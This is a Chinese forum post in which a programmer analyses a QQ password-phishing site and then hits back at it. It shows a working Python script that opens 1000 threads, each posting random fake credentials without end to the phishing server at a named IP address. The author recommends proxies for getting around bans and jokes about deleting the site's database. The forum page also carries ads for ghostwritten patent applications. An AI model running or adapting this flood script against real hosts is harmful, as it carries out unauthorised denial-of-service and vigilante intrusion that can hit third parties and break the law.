111升学论坛

 找回密码
 加入家园
专业、学校怎么选?免费公益咨询解答开通学校版块微信:543646没考上高中怎么办,不要慌!
热门:大连报关学校招生网增加印象分,实用新型专利包过申请发明专利申请并不难,代写全部材料,轻松申请!
查看: 882|回复: 0

当一个程序员遇到盗号网站

[复制链接]

31

主题

77

回帖

340

积分

中级会员

Rank: 3Rank: 3

积分
340
发表于 2021-2-22 21:32:21 | 显示全部楼层 |阅读模式
集群智慧云科服发明专利申请
事情发生的原由

最近收到了一封邮件,邮件长这样,告诉我要期末考试了。

邮件



话说谁不知道要期末考试了,还需要你来告诉我???



一看这个,我就知道绝逼是一个盗号网站,因为以前还遇到过联盟抽奖的邮件。进入之后,网站长这样,emm,这个也太假了吧(看网站的域名即可,不是qq.com结尾的都是耍流氓)。

网站

在这里随便输入一个账号密码,然后告诉你密码错误。





最后自动跳转到qq邮箱的登陆页面(牛逼啊,作者真聪明)。
分析网站请求

在chrome浏览器中,按住F12,然后随便输入账号密码点击登录,就可以看到究竟往后台发送了什么内容。

网站请求

这里可以使用chrome中的一个插件,或者postman,来模拟一下请求。
模拟请求


  • 工具:Crap API(chrome插件)
接下来是模拟请求,然后如下图所示:

模拟请求

那么,我们可以对这个网站进行什么骚操作呢?
骚操作有很多,不过这里我选择了最简单的方式,作死的给这个连接发送请求
选择的编程语言是python,因为简单,写的快。
python代码

下面是用python代码写的一个请求
import requestsimport threadingimport randomimport string# 盗号网站的请求的网址url = "http://154.92.16.197/x$xc/6.asp?sn_sid="def myIpPost():    while(True):        # 产生随机的账号和密码        salt = ''.join(random.sample(string.ascii_letters + string.digits, random.randint(10,15)))         num = ''.join(str(i) for i in random.sample(range(0,9),random.randint(6,9)))        data = {            "qq":num,            "mima":salt,            "MM_insert":"form1"        }        try:           # 发送post请求            r = requests.post(url,data=data,allow_redirects=False)            print(r)        except:            print("I post fail")            passif __name__ == "__main__":     # 开启多线程同时请求    for i in range(0,1000):       threading.Thread(target=myIpPost).start()代码还是很简单的,接下来就是运行代码了。
response 200 则代表请求成功。嘻嘻嘻

response

结语

这种方式是最简单的方式,如果出现ip被ban的话,可以用代理去解决这些问题。实际上还可以尝试着删库跑路,一气呵成,不过最近要考试,没时间去看,就这样吧。
望评论区的大佬们手下留情,毕竟我是个菜鸡。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 加入家园

本版积分规则

QQ|Archiver|手机版|小黑屋|111升学论坛

GMT+8, 2024-12-28 21:26

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表